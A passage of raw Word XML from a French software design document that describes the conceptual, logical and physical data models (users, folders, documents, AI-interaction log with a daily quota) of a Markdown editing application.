            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chaque utilisateur porte un quota d'appels IA par période de 24 heures, fixé à 20 par défaut et modifiable par un administrateur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkStart w:id="61" w:name="Xce2caaf888585857611a8e7c5415fbe0c35bd71"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Le modèle conceptuel (entités-associations)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sept entités, huit associations, toutes de type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">un-à-plusieurs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aucune association plusieurs-à-plusieurs n'apparaît : le modèle ne comporte donc aucune table de jonction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="2785959"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="mcd.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="2785959"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Modèle conceptuel des données (MCD) — sept entités, huit associations, cardinalités Merise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lecture des cardinalités.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Côté</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">USER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, toutes les associations sont en (0,n) : un compte fraîchement créé n'a ni dossier, ni document, ni session. Côté entités dépendantes, elles sont en (1,1) : un dossier, un document, une session, un consentement ou une demande de réinitialisation ne peut pas exister sans utilisateur rattaché. La seule exception est l'association</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">range</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DOSSIER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DOCUMENT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, en (0,1) côté document : c'est la traduction directe de RG3, un document peut vivre hors de tout dossier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pourquoi l'entité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">porte deux liens.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Une interaction est rattachée à la fois au document et à l'utilisateur, alors que le document porte déjà son propriétaire. Cette redondance apparente est volontaire : le quota de RG8 se compte par utilisateur et par fenêtre de 24 heures, indépendamment du document. Sans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, tout comptage de quota imposerait une jointure sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; avec lui, le comptage se fait sur une seule table et sur un index dédié. C'est un choix de dénormalisation limitée, assumé pour la requête la plus fréquente du système.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="62" w:name="Xb3fefdd26fa80135daf43b1a477ca732e5b3ef3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Du modèle conceptuel au modèle physique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois décisions de passage méritent d'être explicitées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Identifiants UUID plutôt qu'entiers auto-incrémentés.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Toutes les clés primaires sont des UUID v4 stockés sur 36 caractères, générés par l'application et non par le SGBD. Deux raisons. D'abord la sécurité : un identifiant séquentiel dans une URL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/documents/42</w:t>
      </w:r>
      <w:r>
        <w:t>) invite à l'énumération, et même si chaque accès vérifie la propriété (§ 5.2), un identifiant non devinable supprime la tentation. Ensuite la portabilité : l'identifiant existe avant l'insertion, ce qui simplifie la création d'objets liés en une seule transaction et rendrait une future répartition de charge indolore. Le coût est connu et accepté : un index sur 36 caractères est plus volumineux qu'un index sur un entier, pour des volumes qui restent ici sans commune mesure avec ce seuil.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Horodatages en UTC, sans fuseau.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Toutes les colonnes de date utilisent un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DATETIME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">naïf alimenté par une fonction utilitaire unique (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utc_now_naive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Le fuseau est appliqué à l'affichage, jamais au stockage. Cela rend les comparaisons de fenêtres — le quota 24 h, l'expiration d'un jeton — indépendantes du fuseau du serveur, et évite les heures ambiguës aux changements d'heure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Statuts et types en chaînes contraintes par l'application.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Les colonnes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">type_action</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">type_consentement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sont des</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VARCHAR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dont les valeurs autorisées sont vérifiées dans la couche routes. Un type énuméré natif serait plus strict au niveau du SGBD ; il a été écarté parce qu'il impose une migration de schéma à chaque nouvelle valeur. Les contraintes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>du script MySQL (§ 5.5) apportent la garantie du SGBD sans la rigidité de l'ENUM.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:id="63" w:name="X0e2a25c2b046df04cea920b3626ed5cfa2f85ea"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="2902041"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="mld.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="2902041"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Modèle logique des données (MLD) — les sept relations après application des règles de passage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Le modèle physique des données</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sept tables. Les clés primaires sont notées</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, les clés étrangères</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">FK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, les contraintes d'unicité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">U</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="2785959"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="mpd.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="2785959"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Modèle physique des données (MPD) — types, clés, index et règles de suppression sur MySQL 8.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— comptes et paramètres d'usage</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lastname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Nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">firstname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Prénom</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VARCHAR(326)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NOT NULL,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">U</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Identifiant de connexion ; 326 = longueur maximale d'une adresse selon la RFC 5321</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mdp_hash</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Empreinte bcrypt, jamais le mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VARCHAR(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NOT NULL, défaut</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ou</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">quota_daily_limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">INT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NOT NULL, défaut 20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Quota IA sur 24 h (RG8)</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Création du compte</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Dernière modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dossier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— regroupement de documents</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id_dossier</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Libellé choisi par l'utilisateur</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de création</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Propriétaire (RG1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— cœur du modèle</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id_document</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titre</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Titre éditable en place</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Contenu Markdown brut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VARCHAR(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">défaut</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">markdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">markdown</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ou</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">wysiwyg</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NOT NULL, défaut</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">brouillon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">brouillon</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">a_relire</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">termine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Création</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Mise à jour, alimentée à chaque enregistrement automatique ou manuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">id_dossier</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dossier</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, NULL, ON DELETE SET NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rangement facultatif (RG3)</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Propriétaire (RG2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— journal des interactions avec le modèle</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id_ia</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type_action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
